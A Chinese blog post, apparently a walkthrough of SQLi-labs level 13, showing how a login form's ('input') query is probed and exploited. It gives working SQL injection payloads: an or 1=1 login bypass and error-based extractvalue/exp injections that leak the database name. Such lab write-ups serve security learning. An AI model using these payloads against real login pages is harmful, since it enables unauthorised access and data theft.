sqllab第十三关通关笔记

知识点:

  • 登录框处常见的语句(一般都是查询语句)
    • where username=''
    • where username=""
    • where usernam=('')
    • where username=("")
  • 错误注入知识回顾
  • 这里使用错误注入

通过admin admin登录发现没有任何回显信息;但是有成功登录的提示

通过bp抓包进行尝试绕过

尝试用单引号看看效果

构造payload:username=admin'

发现了报错信息;应该是一个where username=('输入内容')

好好好,这就好绕过了

构造payload:username=a')+or1=1#

欸,又报错了,发现了更多的信息;两个参数都是('输入内容');但是为啥会报错呢??

仔细一看发现or后面没加空格

重新构造payload:username=a')+or+1=1#

成功登录了;由于没有回显,这里不能用联合注入;

尝试进行错误注入

构造payload:username=a')+or+exp(710)#

成功打印了错误信息;说明这里是可以进行报错注入的

接下来利用报错注入获取数据库名

构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名;

到这里就结束了;报错注入获取表名和字段信息以及敏感内容信息在前几关就展示了;这里就不再进行演示了

10

相关推荐
周周记笔记5 分钟前
学习笔记:第一个Python程序
笔记·学习
丑小鸭是白天鹅8 分钟前
Kotlin协程详细笔记之切线程和挂起函数
开发语言·笔记·kotlin
潘达斯奈基~9 分钟前
《大数据之路1》笔记2:数据模型
大数据·笔记
..过云雨22 分钟前
05.【Linux系统编程】进程(冯诺依曼体系结构、进程概念、进程状态(注意僵尸和孤儿)、进程优先级、进程切换和调度)
linux·笔记·学习
咸甜适中37 分钟前
rust语言 (1.88) egui (0.32.2) 学习笔记(逐行注释)(二十八)使用图片控件显示图片
笔记·学习·rust·egui
一又四分之一.1 小时前
高数基础知识(下)②
笔记
ZHANG8023ZHEN1 小时前
fMoE论文阅读笔记
论文阅读·笔记
Ro Jace2 小时前
文献阅读笔记:R&S电子战测试与测量技术文档
笔记
ZZHow10243 小时前
Maven入门_简介、安装与配置
java·笔记·maven
芜狄6 小时前
UCOSIII移植——学习笔记1
笔记·嵌入式硬件·学习·stm32f103rct6·ucosiii实时操作系统